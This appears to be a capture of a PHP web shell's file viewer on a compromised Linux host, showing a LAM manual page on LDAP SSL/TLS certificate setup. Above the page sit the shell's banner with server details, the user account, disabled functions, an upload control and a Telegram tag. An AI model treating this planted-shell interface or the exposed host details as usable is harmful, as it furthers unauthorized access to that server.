HEX
Server: Apache
System: Linux server2.voipitup.com.au 4.18.0-553.104.1.lve.el8.x86_64 #1 SMP Tue Feb 10 20:07:30 UTC 2026 x86_64
User: posscale (1027)
PHP: 8.2.29
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/posscale/subdomains/Phone_directories/docs/manual/
Upload Files
File: /home/posscale/subdomains/Phone_directories/docs/manual/apbs03.html
<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>LDAP with SSL and TLS</title><link rel="stylesheet" type="text/css" href="style.css"><meta name="generator" content="DocBook XSL Stylesheets V1.78.1"><link rel="home" href="index.html" title="LDAP Account Manager - Manual"><link rel="up" href="apb.html" title="Appendix�B.�Security"><link rel="prev" href="apbs02.html" title="Use of SSL"><link rel="next" href="apbs04.html" title="Chrooted servers"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center">LDAP with SSL and TLS</th></tr><tr><td width="20%" align="left"><a accesskey="p" href="apbs02.html">Prev</a>�</td><th width="60%" align="center">Appendix�B.�Security</th><td width="20%" align="right">�<a accesskey="n" href="apbs04.html">Next</a></td></tr></table><hr></div><div class="section"><div class="titlepage"><div><div><h2 class="title" style="clear: both"><a name="idp51859696"></a>LDAP with SSL and TLS</h2></div></div></div><p>SSL will be used if you use ldaps://servername in your
      configuration profile. TLS can be activated with the "Activate TLS"
      option.</p><p>If your LDAP server uses a SSL certificate of a well-know
      certificate authority (CA) then you probably need no changes. If you use
      a custom CA in your company then there are two ways to setup the CA
      certificates.</p><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="idp51861504"></a>Setup SSL certificates in LAM general settings</h3></div></div></div><p>This is much easier than system level setup and will only affect
        LAM. There might be some cases where other web applications on the
        same web server are influenced.</p><p>See <a class="link" href="ch03.html#conf_sslCert">here</a> for details.</p></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a name="ssl_certSystem"></a>Setup SSL certificates on system level</h3></div></div></div><p>This will make the CA certificates available also to other
        applications on your system (e.g. other web applications).</p><p>You will need to setup ldap.conf to trust your server
        certificate. Some installations use /etc/ldap.conf and some use
        /etc/ldap/ldap.conf. It is a good idea to symlink /etc/ldap.conf to
        /etc/ldap/ldap.conf. Specify the server CA certificate with the
        following option:</p><pre class="programlisting">TLS_CACERT /etc/ldap/ca/myCA/cacert.pem</pre><p>This needs to be the public part of the signing certificate
        authority. See "man ldap.conf" for additional options.</p><div class="literallayout"><p><br>
</p></div><p>You may also need to specify the CA certificate in your Apache
        configuration by using the option "LDAPTrustedGlobalCert":</p><pre class="programlisting">LDAPTrustedGlobalCert CA_BASE64 /etc/ldap/ca/myCA/cacert.pem</pre></div></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="apbs02.html">Prev</a>�</td><td width="20%" align="center"><a accesskey="u" href="apb.html">Up</a></td><td width="40%" align="right">�<a accesskey="n" href="apbs04.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top">Use of SSL�</td><td width="20%" align="center"><a accesskey="h" href="index.html">Home</a></td><td width="40%" align="right" valign="top">�Chrooted servers</td></tr></table></div></body></html>
@ Telegram